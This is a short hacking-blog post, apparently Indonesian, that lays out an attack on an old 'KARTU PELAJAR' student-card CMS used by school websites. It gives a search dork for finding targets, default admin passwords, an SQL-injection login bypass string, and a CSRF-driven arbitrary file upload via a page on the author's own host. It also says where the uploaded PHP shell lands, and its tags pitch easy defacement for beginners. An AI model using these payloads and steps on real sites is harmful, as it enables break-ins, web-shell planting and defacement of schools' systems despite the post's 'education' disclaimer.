Home
Pentest-Hacking

vulnerabilities in KARTU PELAJAR(old) cms

Bug in old KARTU PELAJAR cms Deface kartu pelajar Deface POC kartu pelajar Cms KARTU PELAJAR intitle: KARTU PELAJAR deface untuk pemula Mudah deface


[+] Author : ./meicookies ,developed by Kuroilotuz

[+] Title :vulnerabilities in KARTU PELAJAR cms, Old version

[+] Dork :"Silahkan Login Untuk Akses System." , intitle:KARTU PELAJAR 

======================================

[!] Default u/p : admin/admin for admin role and  itstaf/itstaf for IT STAF role

[+] Bypass admin Login bug 

use: ' or 1=1 limit 1 -- -+


[+] arbitrary file upload with CSRF

[-] Exploit: trget.sch.id/dash_user/aksi/user_update.php

"If the ""Data Berhasil di Ubah"" popup appears it's vulnerable

[-] CSRF : http://kuroilotuz.site/csrf.php

POSTFILE : gambar

[?!] SHELL LOCATION : trget.sch.id/assets/img/user/"your shell.php"


#Make them aware ;)


About the Author

Just for education, all forms of damage / crime are not our responsibility!
#Pentest-Hacking
© Blog KuroiLotuz ‧ All rights reserved. Developed by NLD Blog
Cookie Consent
We serve cookies on this site to analyze traffic, remember your preferences, and optimize your experience.
More Details
Oops!
It seems there is something wrong with your internet connection. Please connect to the internet and start browsing again.
AdBlock Detected!
We have detected that you are using adblocking plugin in your browser.
The revenue we earn by the advertisements is used to manage this website, we request you to whitelist our website in your adblocking plugin.
Site is Blocked
Sorry! This site is not available in your country.